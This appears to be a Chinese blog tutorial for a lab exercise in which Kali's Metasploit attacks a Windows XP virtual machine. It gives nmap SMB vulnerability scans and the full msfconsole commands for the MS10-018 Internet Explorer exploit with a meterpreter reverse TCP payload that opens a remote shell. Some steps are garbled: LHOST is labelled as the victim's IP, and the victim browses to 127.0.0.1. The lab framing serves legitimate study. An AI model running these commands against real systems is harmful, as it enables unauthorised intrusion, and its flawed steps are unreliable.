测试平台
使用平台:Kali(虚拟机)
使用工具:Metasploit
渗透目标:windows xp(虚拟机)
渗透目的:获得目标节点shell
测试步骤
1.前期准备(网络配置)
Kali 和 Windows XP 均使用 Host-Only仅主机 连接方式。
xp使用ipconfig,Kali使用ifconfig,获得并记录下对应IP(图略)【也可用Kali nmap 进行扫描】
同时,需关闭XP防火墙。
注意:做完这些操作后需用ping测试两机互通性。
2.查找漏洞是否可用
首先使用Nmap进行扫描,查看目标主机是否含有我们想要利用的漏洞,
可以使用的命令:
全部扫描:
nmap -P0 --script=smb-vuln-conficker 【IP】
nmap -P0 --script=smb-vuln-* 【IP】
具体扫描:
smb-vuln-ms10-018
进入MSF,查看MS10-018漏洞是否可用。
命令:
sudo msfconsole 进入MSF
search ms10_018 查找漏洞
3.利用漏洞进行监听
Kali开启监听
命令:
use exploit/windows/browser/ms10_018_ie_behaviors
set payload windows/meterpreter/reverse_tcp
set SRVPORT 80
set URIPATH /
set LHOST 192.168.42.131 XP的IP
set LPORT 880
exploit
4.利用漏洞
在XP中打开浏览器,输入http://127.0.0.1/【图略】
至此,漏洞利用成功,获得XP shell,可以进行其余一系列操作。
总结
本文仅简单介绍了使用MSF进行简单的漏洞利用方法,作分享使用。
值得注意的是:为了漏洞利用成功,可尽量选择低版本的XP系统,保证漏洞存在。
有任何问题都可以在评论区和我交流~~